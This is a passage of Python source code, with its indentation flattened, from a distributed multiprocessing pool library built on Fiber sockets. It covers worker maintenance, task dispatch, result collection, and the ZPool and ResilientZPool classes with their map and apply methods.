# use self._processes to replace len(self._pool) to calculate
# chunk size. This is because len(self._pool) is the number
# of jobs not total processes.
chunksize, extra = divmod(len(iterable), self._processes * 4)
if extra:
chunksize += 1
if len(iterable) == 0:
chunksize = 0
task_batches = ClassicPool._get_tasks(func, iterable, chunksize)
result = mp_pool.MapResult(self._cache, chunksize, len(iterable),
callback, error_callback=error_callback)
self._taskqueue.put(
(
self._guarded_task_generation(result._job,
mapper,
task_batches),
None
)
)
return result
@staticmethod
def _handle_workers(cache, taskqueue, ctx, Process, processes, pool,
threads, inqueue, outqueue, initializer, initargs,
maxtasksperchild, wrap_exception):
thread = threading.current_thread()
# Keep maintaining workers until the cache gets drained, unless the
# pool is terminated.
while thread._state == RUN or (cache and thread._state != TERMINATE):
ClassicPool._maintain_pool(ctx, Process, processes, pool, threads,
inqueue, outqueue, initializer, initargs,
maxtasksperchild, wrap_exception)
time.sleep(0.1)
logger.debug("_handle_workers exits")
@staticmethod
def _join_exited_workers(pool):
"""Cleanup after any worker processes which have exited due to reaching
their specified lifetime. Returns True if any workers were cleaned up.
"""
cleaned = False
thread = threading.current_thread()
for i in reversed(range(len(pool))):
# leave dead workers for later cleaning
if getattr(thread, "_state", None) == TERMINATE:
logger.debug("pool is being terminated, "
"leave dead workers for later cleaning")
break
worker = pool[i]
if worker._start_failed:
cleaned = True
del pool[i]
logger.debug("remove process %s which failed to "
"start", worker.name)
continue
logger.debug("check worker.exitcode %s", worker.name)
if worker.exitcode is not None:
# worker exited
worker.join()
cleaned = True
del pool[i]
return cleaned
def _repopulate_pool(self):
return self._repopulate_pool_static(self._ctx, self.Process,
self._processes,
self._pool, self._threads,
self._inqueue,
self._outqueue, self._initializer,
self._initargs,
self._maxtasksperchild,
self._wrap_exception)
@staticmethod
def _repopulate_pool_static(ctx, Process, processes, pool, threads,
inqueue, outqueue, initializer, initargs,
maxtasksperchild, wrap_exception):
"""Bring the number of pool processes up to the specified number,
for use after reaping workers which have exited.
"""
logger.debug("_repolulate_pool_static, pool: %s", pool)
thread = threading.current_thread()
workers_per_fp = config.cpu_per_job
remain = processes - len(pool) * workers_per_fp
while remain > 0:
            # don't repopulate workers if exiting
logger.debug(
"processes %s, len(pool) %s",
processes, len(pool)
)
if getattr(thread, "_state", None) == TERMINATE:
logger.debug("pool is being terminated, stop "
"repopulating workers")
break
num_workers = (
workers_per_fp if remain >= workers_per_fp else remain
)
w = Process(ctx, target=mp_worker,
args=(inqueue, outqueue,
initializer,
initargs, maxtasksperchild,
wrap_exception, num_workers))
pool.append(w)
remain = remain - num_workers
w.name = w.name.replace('Process', 'PoolWorker')
w.daemon = True
td = threading.Thread(target=safe_start, args=(w,))
td.start()
threads.append(td)
logger.debug("start multiprocessing.pool.worker starter "
"thread(%s:%s)",
td.name, td.ident)
logger.debug("_repolulate_pool_static done, pool: %s", pool)
@staticmethod
def _maintain_pool(ctx, Process, processes, pool, threads, inqueue,
outqueue, initializer, initargs, maxtasksperchild,
wrap_exception):
"""Clean up any exited workers and start replacements for them.
"""
if ClassicPool._join_exited_workers(pool):
ClassicPool._repopulate_pool_static(ctx, Process, processes, pool,
threads, inqueue, outqueue,
initializer, initargs,
maxtasksperchild,
wrap_exception)
@staticmethod
def _handle_tasks(taskqueue, put, outqueue, pool, cache):
thread = threading.current_thread()
for taskseq, set_length in iter(taskqueue.get, None):
task = None
try:
# iterating taskseq cannot fail
for task in taskseq:
if thread._state:
break
try:
put(task)
except Exception as e:
job, idx = task[:2]
try:
cache[job]._set(idx, (False, e))
except KeyError:
pass
else:
if set_length:
idx = task[1] if task else -1
set_length(idx + 1)
continue
break
finally:
task = taskseq = job = None
else:
logger.debug('_handle_tasks: task handler got sentinel')
try:
# tell result handler to finish when cache is empty
logger.debug('_handle_tasks: task handler sending sentinel '
'to result handler')
outqueue.put(None)
# tell workers there is no more work
logger.debug('_handle_tasks: task handler sending sentinel '
'to workers')
for p in pool:
put(None)
except OSError:
logger.debug('_handle_tasks: task handler got OSError when '
'sending sentinels')
logger.debug('_handle_tasks: task handler exiting')
@staticmethod
def _handle_results(outqueue, get, cache):
thread = threading.current_thread()
while 1:
try:
task = get()
except (OSError, EOFError):
# logger.debug('result handler got EOFError/OSError: exiting')
return
if thread._state:
assert thread._state == TERMINATE
# logger.debug('result handler found thread._state=TERMINATE')
break
if task is None:
# logger.debug('result handler got sentinel')
break
job, i, obj = task
try:
cache[job]._set(i, obj)
except KeyError:
pass
task = job = obj = None
while cache and thread._state != TERMINATE:
try:
task = get()
except (OSError, EOFError):
logger.debug('result handler got EOFError/OSError -- exiting')
return
if task is None:
logger.debug('result handler ignoring extra sentinel')
continue
job, i, obj = task
try:
cache[job]._set(i, obj)
except KeyError:
pass
task = job = obj = None
if hasattr(outqueue, '_reader'):
logger.debug('ensuring that outqueue is not full')
# If we don't make room available in outqueue then
# attempts to add the sentinel (None) to outqueue may
# block. There is guaranteed to be no more than 2 sentinels.
try:
for i in range(10):
if not outqueue._reader.poll():
break
get()
except (OSError, EOFError):
pass
logger.debug('result handler exiting: len(cache)=%s, thread._state=%s',
len(cache), thread._state)
@classmethod
def _terminate_pool(cls, taskqueue, inqueue, outqueue, pool, threads,
worker_handler, task_handler, result_handler, cache):
# this is guaranteed to only be called once
logger.debug('finalizing pool')
start = time.time()
terminate_start = start
worker_handler._state = TERMINATE
task_handler._state = TERMINATE
logger.debug('helping task handler/workers to finish')
assert result_handler.is_alive() or len(cache) == 0
result_handler._state = TERMINATE
outqueue.put(None) # sentinel
# This was previously done in _handle_workers, we move it here to
# improve terminating speed
logger.debug("send sentinel, put None in task queue")
taskqueue.put(None)
elapsed = time.time() - start
start = start + elapsed
logger.debug("outqueue put None took %s", elapsed)
        # Since worker_handler._state is already set, no more new processes
        # will be created, so we don't need to wait for worker_handler.
        # The original comments below no longer apply; they are kept here
        # for reference.
#
# Original comment: We must wait for the worker handler to exit before
# terminating workers because we don't want workers to be restarted
# behind our back.
# logger.debug('joining worker handler')
# if threading.current_thread() is not worker_handler:
# worker_handler.join()
elapsed = time.time() - start
start = start + elapsed
logger.debug("joining worker handler took %s", elapsed)
logger.debug('tell process._popen that it should exit')
for p in pool:
if p._popen is not None:
logger.debug('set process._popen._exiting = True '
'for %s', p.name)
p._popen._exiting = True
elapsed = time.time() - start
start = start + elapsed
logger.debug("setting p._popen._exiting took %s", elapsed)
logger.debug('joining starter threads')
for td in threads:
# wait for all starter threads to finish
logger.debug('joining starter thread %s', td.name)
td.join()
logger.debug('joining starter thread finished')
elapsed = time.time() - start
start = start + elapsed
logger.debug("joining starter threads took %s", elapsed)
N = min(100, len(pool))
# Thread pool used for process termination. With randomized delay, this
# roughly equals N requests per second.
tpool = ThreadPool(N)
# Terminate workers which haven't already finished.
if pool and hasattr(pool[0], 'terminate'):
logger.debug('terminating workers')
tpool.map_async(safe_terminate_worker, pool)
elapsed = time.time() - start
start = start + elapsed
logger.debug("run safe_terminate_worker threads took %s", elapsed)
logger.debug('joining task handler')
if threading.current_thread() is not task_handler:
task_handler.join()
elapsed = time.time() - start
start = start + elapsed
logger.debug("joining task handler took %s", elapsed)
logger.debug('joining result handler')
if threading.current_thread() is not result_handler:
result_handler.join()
elapsed = time.time() - start
start = start + elapsed
logger.debug("joining result handler took %s", elapsed)
tpool = ThreadPool(N)
if pool and hasattr(pool[0], 'terminate'):
logger.debug('joining pool workers, this may take some '
'time. workers: %s', pool)
tpool.map(safe_join_worker, pool)
elapsed = time.time() - start
start = start + elapsed
logger.debug("joining pool workers took %s", elapsed)
logger.debug(
"terminating pool finished. it took %s",
time.time() - terminate_start
)
class Inventory():
"""An inventory object that holds map results.
An `seq` needs to be requested with `add` method so that map result can
be tracked. `seq` acts as an request id. In later stage, `get` method
can be called with corresponding `seq`. This inventory will handle waiting,
managing results from different map calls.
"""
def __init__(self, queue_get):
self._seq = 0
self._queue_get = queue_get
self._inventory = {}
self._spec = {}
self._idx_cur = {}
def add(self, ntasks):
self._seq += 1
self._inventory[self._seq] = [None] * ntasks
self._spec[self._seq] = ntasks
self._idx_cur[self._seq] = 0
return self._seq
def get(self, job_seq):
n = self._spec[job_seq]
while n != 0:
# seq, batch, batch + i, result
seq, _, i, result = self._queue_get()
self._inventory[seq][i] = result
self._spec[seq] -= 1
if seq == job_seq:
n = self._spec[seq]
ret = self._inventory[job_seq]
self._inventory[job_seq] = None
return ret
def iget_unordered(self, job_seq):
n = self._spec[job_seq]
while n != 0:
# seq, batch, batch + i, result
seq, _, i, result = self._queue_get()
self._inventory[seq][i] = result
self._spec[seq] -= 1
if seq == job_seq:
res = self._inventory[job_seq][i]
self._inventory[job_seq][i] = None
n = self._spec[seq]
yield res
return
def iget_ordered(self, job_seq):
idx = self._idx_cur[job_seq]
total = len(self._inventory[job_seq])
while idx != total:
if self._inventory[job_seq][idx] is not None:
res = self._inventory[job_seq][idx]
self._inventory[job_seq][idx] = None
idx += 1
self._spec[job_seq] = idx
yield res
continue
# seq, batch, batch + i, result
seq, _, i, result = self._queue_get()
self._inventory[seq][i] = result
if seq == job_seq:
if i == idx:
# got the next one
res = self._inventory[job_seq][i]
self._inventory[job_seq][i] = None
idx += 1
self._spec[job_seq] = idx
yield res
return
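# Hedged sketch of the Inventory protocol described above (illustrative only;
# the lambda stands in for the Pool's result-socket reader, and the tuples
# follow the (seq, batch, batch + i, result) layout used by the pool workers):
#
#   results = iter([(1, 0, 0, "a"), (1, 0, 1, "b")])
#   inv = Inventory(lambda: next(results))
#   seq = inv.add(2)      # reserve two result slots; returns the request id
#   inv.get(seq)          # -> ["a", "b"]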
class MapResult():
def __init__(self, seq, inventory):
self._seq = seq
self._inventory = inventory
def get(self):
return self._inventory.get(self._seq)
def iget_ordered(self):
return self._inventory.iget_ordered(self._seq)
def iget_unordered(self):
return self._inventory.iget_unordered(self._seq)
class ApplyResult(MapResult):
"""An object that is returned by asynchronous methods of `Pool`. It
    represents a handle that can be used to get the actual result.
"""
def get(self):
"""Get the actual result represented by this object
:returns: Actual result. This method will block if the actual result
is not ready.
"""
return self._inventory.get(self._seq)[0]
def zpool_worker_core(master_conn, result_conn, maxtasksperchild,
wrap_exception, rank=-1, req=False):
"""
The actual function that processes tasks.
:param master_conn: connection that is used to read task from Pool.
:param result_conn: connection that is used to send results to Pool.
:param maxtasksperchild: TODO: max tasks per child process.
"param wrap_exception: TODO
"param rank: used when zpool_worker started many zpool_worker_core
processes. `rank` is the id of this process.
"pram req": whether master_conn is based on a REQ type socket. When this
flag is set, `zpool_worker_core` needs to request tasks from the Pool
by send it's (ident, proc.id) to the Pool and Pool will send a task
back to the worker. This doesn't change result_conn.
"""
logger.debug("zpool_worker_core started %s", rank)
proc = None
ident = secrets.token_bytes(4)
if req:
proc = current_process()
while True:
if req:
# master_conn is a REQ type socket, need to send id (rank) to
# master to request a task. id is packed in type unsigned short (H)
master_conn.send_bytes(struct.pack("4si", ident, proc.pid))
#print("worker_core send", ident, proc.pid)
task = master_conn.recv()
if task is None:
logger.debug("task worker got None, exiting")
break
seq, batch, func, arg_list, starmap = task
logger.debug('zpool_worker got %s, %s, %s, %s', seq, batch,
func, arg_list)
if len(arg_list) == 0:
continue
if starmap:
for i, arg_item in enumerate(arg_list):
nargs = len(arg_item)
if nargs == 2:
args, kwds = arg_item
res = func(*args, **kwds)
elif nargs == 1:
args = arg_item[0]
res = func(*args)
else:
raise ValueError("Bad number of args, %s %s",
nargs, arg_item)
data = (seq, batch, batch + i, res)
if req:
data += (ident,)
result_conn.send(data)
else:
for i, args in enumerate(arg_list):
res = func(args)
data = (seq, batch, batch + i, res)
if req:
data += (ident,)
result_conn.send(data)
#print("worker_core exit, ", rank, proc.pid)
def handle_signal(signal, frame):
# run sys.exit() so that atexit handlers can run
sys.exit()
def zpool_worker(master_conn, result_conn, initializer=None, initargs=(),
maxtasks=None, wrap_exception=False, num_workers=1, req=False):
"""
The entry point of Pool worker function.
:param master_conn: connection that is used to read task from Pool.
:param result_conn: connection that is used to send results to Pool.
:param maxtasksperchild: TODO: max tasks per child process.
:param wrap_exception: TODO
:param num_workers: number of workers to start.
:param rank: used when zpool_worker started many zpool_worker_core
processes. `rank` is the id of this process.
:param req: whether master_conn is based on a REQ type socket. When this
flag is set, `zpool_worker_core` needs to request tasks from the Pool
        by sending its (ident, proc.pid) to the Pool, and the Pool will send a
        task back to the worker. This doesn't change result_conn.
"""
logger.debug("zpool_worker running")
signal.signal(signal.SIGTERM, handle_signal)
if wrap_exception:
# TODO(jiale) implement wrap_exception
raise NotImplementedError
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
if initializer is not None:
initializer(*initargs)
if num_workers == 1:
return zpool_worker_core(master_conn, result_conn, maxtasks,
wrap_exception, 0, req=req)
workers = []
for i in range(num_workers):
# Use fork context to make sure that imported modules and other things
# are shared. This is useful when modules share objects between
# processes.
ctx = mp.get_context('fork')
p = ctx.Process(target=zpool_worker_core,
args=(master_conn, result_conn, maxtasks,
wrap_exception, i, req), daemon=True)
p.start()
workers.append(p)
for w in workers:
w.join()
class ZPool():
"""A Pool implementation based on Fiber sockets.
ZPool directly uses Fiber sockets instead of SimpleQueue for tasks and
results handling. This makes it faster.
"""
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, cluster=None,
master_sock_type="w"):
self._pool = []
self._processes = processes
self._initializer = initializer
self._initargs = initargs
self._maxtasksperchild = maxtasksperchild
self._cluster = cluster
self._seq = 0
self._state = RUN
self.taskq = queue.Queue()
self.sent_tasks = 0
self.recv_tasks = 0
self.max_processing_tasks = 20000
# networking related
backend = get_backend()
ip, _, _ = backend.get_listen_addr()
socket = Socket(mode=master_sock_type)
_master_port = socket.bind()
_master_addr = 'tcp://{}:{}'.format(ip, _master_port)
self._master_addr = _master_addr
self._master_sock = socket
socket = Socket(mode="r")
_result_port = socket.bind()
_result_addr = 'tcp://{}:{}'.format(ip, _result_port)
self._result_addr = _result_addr
self._result_sock = socket
logger.debug("creating %s", self)
self._inventory = Inventory(self._res_get)
logger.debug("%s, starting workers", self)
td = threading.Thread(
target=self.__class__._handle_workers, args=(self,)
)
td.daemon = True
td._state = RUN
        # `td` will be started later by `lazy_start_workers`
self._worker_handler = td
self._worker_handler_started = False
# launch task handler
td = threading.Thread(
target=self._handle_tasks,
)
td.daemon = True
td._state = RUN
td.start()
self._task_handler = td
def __repr__(self):
return "<{}({}, {})>".format(
type(self).__name__,
getattr(self, "_processes", None),
getattr(self, "_master_addr", None),
)
def _handle_tasks(self):
taskq = self.taskq
master_sock = self._master_sock
while True:
if self.sent_tasks - self.recv_tasks > self.max_processing_tasks:
time.sleep(0.2)
continue
task = taskq.get()
data = pickle.dumps(task)
master_sock.send(data)
self.sent_tasks += 1
def _task_put(self, task):
self.taskq.put(task)
def _res_get(self):
payload = self._result_sock.recv()
self.recv_tasks += 1
data = pickle.loads(payload)
return data
@staticmethod
def _join_exited_workers(workers):
thread = threading.current_thread()
logger.debug("ZPool _join_exited_workers running, workers %s, "
"thread._state %s", workers, thread._state)
exited_workers = []
for i in reversed(range(len(workers))):
if thread._state != RUN:
break
worker = workers[i]
if worker._start_failed:
exited_workers.append(worker)
del workers[i]
logger.debug("ZPool _join_exited_workers running, "
"worker._start_failed +1 %s", worker)
continue
if worker.exitcode is not None:
worker.join()
exited_workers.append(worker)
del workers[i]
logger.debug("ZPool _join_exited_workers running, "
"worker.join() done +1 %s", worker)
continue
logger.debug("ZPool _join_exited_workers finished, workers %s, "
"exited %s", workers, exited_workers)
return exited_workers
@staticmethod
def _maintain_workers(processes, workers, master_addr, result_addr, initializer,
initargs, maxtasksperchild):
thread = threading.current_thread()
workers_per_fp = config.cpu_per_job
left = processes - len(workers)
logger.debug("ZPool _maintain_workers running, workers %s", workers)
threads = []
while left > 0 and thread._state == RUN:
if left > workers_per_fp:
n = workers_per_fp
else:
n = left
master_conn = LazyZConnection(("r", master_addr))
result_conn = LazyZConnection(("w", result_addr))
master_conn.set_name("master_conn")
w = fiber.process.Process(target=zpool_worker,
args=(master_conn,
result_conn,
initializer,
initargs,
maxtasksperchild,
False,
n),
daemon=False)
w.name = w.name.replace("Process", "PoolWorker")
td = threading.Thread(target=safe_start, args=(w,))
td.start()
threads.append(td)
logger.debug("started safe_start thread %s", td)
# w.start()
logger.debug("started proc %s", w)
workers.append(w)
left -= n
for td in threads:
logger.debug("joining safe_start thread %s", td)
td.join(2)
logger.debug("joining safe_start thread %s finished", td)
logger.debug("ZPool _maintain_workers finished, workers %s", workers)
@staticmethod
def _handle_workers(pool):
logger.debug("%s _handle_workers running", pool)
td = threading.current_thread()
ZPool._maintain_workers(
pool._processes, pool._pool,
pool._master_addr, pool._result_addr, pool._initializer,
pool._initargs, pool._maxtasksperchild
)
while td._state == RUN:
if len(ZPool._join_exited_workers(pool._pool)) > 0:
# create new workers when old workers exited
ZPool._maintain_workers(
pool._processes, pool._pool,
pool._master_addr, pool._result_addr, pool._initializer,
pool._initargs, pool._maxtasksperchild
)
time.sleep(0.5)
logger.debug("%s _handle_workers finished. Status is not RUN",
pool)
@staticmethod
def _chunks(iterable, size):
for i in range(0, len(iterable), size):
yield iterable[i:i + size]
def apply_async(self, func, args=(), kwds={}, callback=None,
error_callback=None):
"""
Run function `func` with arguments `args` and keyword arguments `kwds`
on a remote Pool worker. This is an asynchronous version of `apply`.
:param func: target function to run.
        :param args: positional arguments that need to be passed to `func`.
        :param kwds: keyword arguments that need to be passed to `func`.
:param callback: Currently not supported. A callback function that will
be called when the result is ready.
:param error_callback: Currently not supported. A callback function
            that will be called when an error occurs.
:returns: An ApplyResult object which has a method `.get()` to get
the actual results.
"""
if self._state != RUN:
raise ValueError("Pool is not running")
# assert kwds == {}, 'kwds not supported yet'
self.lazy_start_workers(func)
seq = self._inventory.add(1)
self._task_put((seq, 0, func, [(args, kwds)], True))
res = ApplyResult(seq, self._inventory)
return res
def start_workers(self):
self._worker_handler.start()
self._worker_handler_started = True
def lazy_start_workers(self, func):
if hasattr(func, "__fiber_meta__"):
if (
not hasattr(zpool_worker, "__fiber_meta__")
or zpool_worker.__fiber_meta__ != func.__fiber_meta__
):
if self._worker_handler_started:
raise RuntimeError(
"Cannot run function that has different resource "
"requirements acceptable by this pool. Try creating a "
"different pool for it."
)
zpool_worker.__fiber_meta__ = func.__fiber_meta__
if not self._worker_handler_started:
self.start_workers()
def map_async(self, func, iterable, chunksize=None, callback=None,
error_callback=None):
"""
For each element `e` in `iterable`, run `func(e)`. The workload is
distributed between all the Pool workers. This is an asynchronous
version of `map`.
:param func: target function to run.
:param iterable: an iterable object to be mapped.
        :param chunksize: if set, elements in `iterable` will be put into
            chunks whose size is decided by `chunksize`. These chunks will be
            sent to Pool workers instead of individual elements of `iterable`.
            If not set, the chunksize is decided automatically.
:param callback: Currently not supported. A callback function that will
be called when the result is ready.
:param error_callback: Currently not supported. A callback function
            that will be called when an error occurs.
        :returns: A MapResult object which has a method `.get()` to get
the actual results.
"""
if error_callback:
# TODO(jiale) implement error callback
raise NotImplementedError
if self._state != RUN:
raise ValueError("Pool is not running")
if chunksize is None:
chunksize = 32
if not hasattr(iterable, '__len__'):
iterable = list(iterable)
self.lazy_start_workers(func)
seq = self._inventory.add(len(iterable))
chunks = self.__class__._chunks(iterable, chunksize)
for batch, chunk in enumerate(chunks):
self._task_put((seq, batch * chunksize, func, chunk, False))
res = MapResult(seq, self._inventory)
return res
def apply(self, func, args=(), kwds={}):
"""
Run function `func` with arguments `args` and keyword arguments `kwds`
on a remote Pool worker.
:param func: target function to run.
        :param args: positional arguments that need to be passed to `func`.
        :param kwds: keyword arguments that need to be passed to `func`.
:returns: the return value of `func(*args, **kwargs)`.
"""
return self.apply_async(func, args, kwds).get()
def map(self, func, iterable, chunksize=None):
"""
For each element `e` in `iterable`, run `func(e)`. The workload is
distributed between all the Pool workers.
:param func: target function to run.
:param iterable: an iterable object to be mapped.
        :param chunksize: if set, elements in `iterable` will be put into
            chunks whose size is decided by `chunksize`. These chunks will be
            sent to Pool workers instead of individual elements of `iterable`.
            If not set, the chunksize is decided automatically.
:returns: A list of results equivalent to calling
`[func(x) for x in iterable]`.
"""
logger.debug('%s map func=%s', self, func)
return self.map_async(func, iterable, chunksize).get()
def imap(self, func, iterable, chunksize=1):
"""
For each element `e` in `iterable`, run `func(e)`. The workload is
        distributed between all the Pool workers. This function returns an
        iterator which the user can iterate over to get results.
:param func: target function to run.
:param iterable: an iterable object to be mapped.
        :param chunksize: if set, elements in `iterable` will be put into
            chunks whose size is decided by `chunksize`. These chunks will be
            sent to Pool workers instead of individual elements of `iterable`.
            If not set, the chunksize is decided automatically.
        :returns: an iterator which the user can use to get results.
"""
res = self.map_async(func, iterable, chunksize)
return res.iget_ordered()
def imap_unordered(self, func, iterable, chunksize=1):
"""
For each element `e` in `iterable`, run `func(e)`. The workload is
        distributed between all the Pool workers. This function returns an
        **unordered** iterator which the user can iterate over to get results.
This means that the order of the results may not match the order of
the `iterable`.
:param func: target function to run.
:param iterable: an iterable object to be mapped.
        :param chunksize: if set, elements in `iterable` will be put into
            chunks whose size is decided by `chunksize`. These chunks will be
            sent to Pool workers instead of individual elements of `iterable`.
            If not set, the chunksize is decided automatically.
        :returns: an unordered iterator which the user can use to get results.
"""
res = self.map_async(func, iterable, chunksize)
return res.iget_unordered()
def starmap_async(self, func, iterable, chunksize=None, callback=None,
error_callback=None):
"""
For each element `args` in `iterable`, run `func(*args)`. The workload
is distributed between all the Pool workers. This is an asynchronous
version of `starmap`.
For example, `starmap_async(func, [(1, 2, 3), (4, 5, 6)])` will result
in calling `func(1, 2, 3)` and `func(4, 5, 6)` on a remote host.
:param func: target function to run.
:param iterable: an iterable object to be mapped.
        :param chunksize: if set, elements in `iterable` will be put into
            chunks whose size is decided by `chunksize`. These chunks will be
            sent to Pool workers instead of individual elements of `iterable`.
            If not set, the chunksize is decided automatically.
:param callback: Currently not supported. A callback function that will
be called when the result is ready.
:param error_callback: Currently not supported. A callback function
            that will be called when an error occurs.
        :returns: A MapResult object which has a method `.get()` to get
the actual results.
"""
if self._state != RUN:
raise ValueError("Pool is not running")
if chunksize is None:
chunksize = 32
if not hasattr(iterable, '__len__'):
iterable = list(iterable)
self.lazy_start_workers(func)
seq = self._inventory.add(len(iterable))
chunks = self.__class__._chunks(iterable, chunksize)
for batch, chunk in enumerate(chunks):
self._task_put((seq, batch * chunksize, func, (chunk, ), True))
res = MapResult(seq, self._inventory)
return res
def starmap(self, func, iterable, chunksize=None):
"""
For each element `args` in `iterable`, run `func(*args)`. The workload
is distributed between all the Pool workers.
For example, `starmap_async(func, [(1, 2, 3), (4, 5, 6)])` will result
in calling `func(1, 2, 3)` and `func(4, 5, 6)` on a remote host.
:param func: target function to run.
:param iterable: an iterable object to be mapped.
        :param chunksize: if set, elements in `iterable` will be put into
            chunks whose size is decided by `chunksize`. These chunks will be
            sent to Pool workers instead of individual elements of `iterable`.
            If not set, the chunksize is decided automatically.
:returns: A list of results equivalent to calling
`[func(*arg) for arg in iterable]`
"""
return self.starmap_async(func, iterable, chunksize).get()
def _send_sentinels_to_workers(self):
logger.debug('send sentinels(None) to workers %s', self)
for i in range(self._processes):
self._task_put(None)
def close(self):
"""
        Close this Pool. This means the current pool will be put into a
closing state and it will not accept new tasks. Existing workers will
continue to work on tasks that have been dispatched to them and exit
when all the tasks are done.
"""
logger.debug('closing pool %s', self)
if self._state == RUN:
self._state = CLOSE
self._worker_handler._state = CLOSE
for p in self._pool:
if hasattr(p, '_sentinel'):
p._state = CLOSE
self._send_sentinels_to_workers()
def terminate(self):
"""
Terminate this pool. This means that this pool will be terminated and
        all its pool workers will also be terminated. Tasks that have been
dispatched will be discarded.
"""
logger.debug('terminating pool %s', self)
logger.debug('set pool._worker_handler.status = TERMINATE')
self._worker_handler._state = TERMINATE
self._state = TERMINATE
for p in self._pool:
p._state = TERMINATE
pool = self._pool
N = min(100, len(pool))
# Thread pool used for process termination. With randomized delay, this
# roughly equals N requests per second.
tpool = ThreadPool(N)
# Terminate workers which haven't already finished.
if pool and hasattr(pool[0], 'terminate'):
logger.debug('terminating workers')
# tpool.map_async(safe_terminate_worker, pool)
tpool.map(safe_terminate_worker, pool)
if pool and hasattr(pool[0], 'terminate'):
logger.debug("joining pool workers, this may take some "
"time. workers: %s", pool)
tpool.map(safe_join_worker, pool)
logger.debug("joining pool._worker_handler")
self._worker_handler.join()
def join(self):
"""
Wait for all the pool workers of this pool to exit. This should be
used after `terminate()` or `close()` are called on this pool.
"""
logger.debug('%s.join()', self)
assert self._state in (TERMINATE, CLOSE)
for p in self._pool:
if p._state not in (TERMINATE, CLOSE):
logger.debug("%s.join() ignore newly connected Process %s",
self, p)
continue
p.join()
def wait_until_workers_up(self):
logger.debug('%s begin wait_until_workers_up', self)
workers_per_fp = config.cpu_per_job
n = math.ceil(float(self._processes) / workers_per_fp)
while len(self._pool) < n:
logger.debug("%s waiting for all workers to be up, expected %s, "
"got %s", self, n, self._pool)
time.sleep(0.5)
for p in self._pool:
logger.debug('%s waiting for _sentinel %s', self, p)
while not hasattr(p, '_sentinel') or p._sentinel is None:
time.sleep(0.5)
        # now all the workers have connected to the master; wait
# for some additional time to be sure.
time.sleep(1)
logger.debug('%s wait_until_workers_up done', self)
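# Illustrative usage sketch for the ZPool API documented above (apply/map/
# apply_async/imap_unordered plus the close()/join() shutdown sequence). It is
# not executed on import and assumes a working Fiber backend; `_square_example`
# is a hypothetical helper defined only for this sketch.
def _square_example(x):
    return x * x
def _zpool_usage_sketch():
    pool = ZPool(processes=4)
    try:
        print(pool.apply(_square_example, (3,)))        # 9
        print(pool.map(_square_example, range(8)))      # [0, 1, 4, 9, 16, 25, 36, 49]
        res = pool.apply_async(_square_example, (5,))
        print(res.get())                                # 25
        for value in pool.imap_unordered(_square_example, range(8)):
            print(value)                                # results arrive in arbitrary order
    finally:
        pool.close()
        pool.join()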
class ResilientZPool(ZPool):
"""
    ZPool with error handling. The differences are:
    * The master socket is a ROUTER socket instead of a DEALER socket.
    * A pending table is added.
    * When a dead worker is detected, its jobs are resubmitted to the work
      queue in addition to restarting that worker.
The API of `ResilientZPool` is the same as `ZPool`.
"""
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, cluster=None):
self.active_peer_dict = {}
self.active_peer_list = []
self.peer_lock = threading.Lock()
self.taskq = queue.Queue()
self._pending_table = {}
super(ResilientZPool, self).__init__(
processes=processes,
initializer=initializer,
initargs=initargs,
maxtasksperchild=maxtasksperchild,
cluster=cluster,
master_sock_type="rep")
'''
# launch task handler
td = threading.Thread(
target=self._handle_tasks,
args=(
self.taskq,
self._master_sock,
self.active_peer_list,
self._pending_table,
))
td.daemon = True
td._state = RUN
td.start()
self._task_handler = td
'''
self._pid_to_rid = {}
def _add_peer(self, ident):
self.peer_lock.acquire()
self.active_peer_dict[ident] = True
self._pending_table[ident] = {}
self.active_peer_list.append(ident)
self.peer_lock.release()
def _remove_peer(self, ident):
        # _pending_table will be cleared later in the error handling phase
self.peer_lock.acquire()
del self.active_peer_dict[ident]
self.active_peer_list.remove(ident)
self.peer_lock.release()
def _res_get(self):
# check for system messages
payload = self._result_sock.recv()
data = pickle.loads(payload)
# remove item from pending table
seq, batch, i, result, ident = data
# seq, batch, func, chunks, is_starmap
task = self._pending_table[ident][(seq, batch)]
chunksize = len(task[3])
if i == batch + chunksize - 1:
# this batch has been processed, remove this item from pending
# table
del self._pending_table[ident][(seq, batch)]
# skip ident
return data[:-1]
def _task_put(self, task):
self.taskq.put(task)
def _handle_tasks(self):
thread = threading.current_thread()
taskq = self.taskq
master_sock = self._master_sock
pending_table = self._pending_table
while thread._state == RUN:
task = taskq.get()
if task is None:
logger.debug("_handle_tasks got sentinel")
break
msg = master_sock.recv()
ident, pid = struct.unpack("4si", msg)
# add peer
if not self.active_peer_dict.get(ident, None):
logger.debug('ResilientZPool got REG %s', msg)
self._add_peer(ident)
self._pid_to_rid[pid] = ident
data = pickle.dumps(task)
seq, batch, func, arg_list, starmap = task
# use (seq, batch) to identify a (chunked) task. batch is the start
# number of that batch.
pending_table[ident][(seq, batch)] = task
master_sock.send(data)
# tell peers to exit
data = pickle.dumps(None)
#print("send sentinals to workers, active peers", self.active_peer_list)
for i in range(len(self._pool)):
#print("waiting for requests")
msg = master_sock.recv()
#print("got ", msg)
master_sock.send(data)
#print("send ", data)
#print("exiting handle_tasks ")
logger.debug('ResilientZPool _handle_tasks exited')
@staticmethod
def _maintain_workers(processes, workers, master_addr, result_addr, initializer,
initargs, maxtasksperchild):
thread = threading.current_thread()
workers_per_fp = config.cpu_per_job
left = processes - len(workers)
logger.debug("ResilientZPool _maintain_workers running, workers %s",
workers)
threads = []
while left > 0 and thread._state == RUN:
if left > workers_per_fp:
n = workers_per_fp
else:
n = left
master_conn = LazyZConnection(("req", master_addr))
result_conn = LazyZConnection(("w", result_addr))
#conn = LazyZConnectionReg(("req", master_addr))
master_conn.set_name("master_conn")
w = fiber.process.Process(target=zpool_worker,
args=(master_conn,
result_conn,
initializer,
initargs,
maxtasksperchild,
False,
n,
True),
daemon=False)
w.name = w.name.replace("Process", "PoolWorker")
td = threading.Thread(target=safe_start, args=(w,))
td.start()
threads.append(td)
logger.debug("started safe_start thread %s", td)
# w.start()
logger.debug("started proc %s", w)
workers.append(w)
left -= n
for td in threads:
logger.debug("joining safe_start thread %s", td)
td.join(2)
logger.debug("joining safe_start thread %s finished", td)
logger.debug("ResilientZPool _maintain_workers finished, workers %s",
workers)
@staticmethod
def _handle_workers(pool):
logger.debug("%s _handle_workers running", pool)
td = threading.current_thread()
ResilientZPool._maintain_workers(
pool._processes, pool._pool,
pool._master_addr, pool._result_addr, pool._initializer,
pool._initargs, pool._maxtasksperchild
)
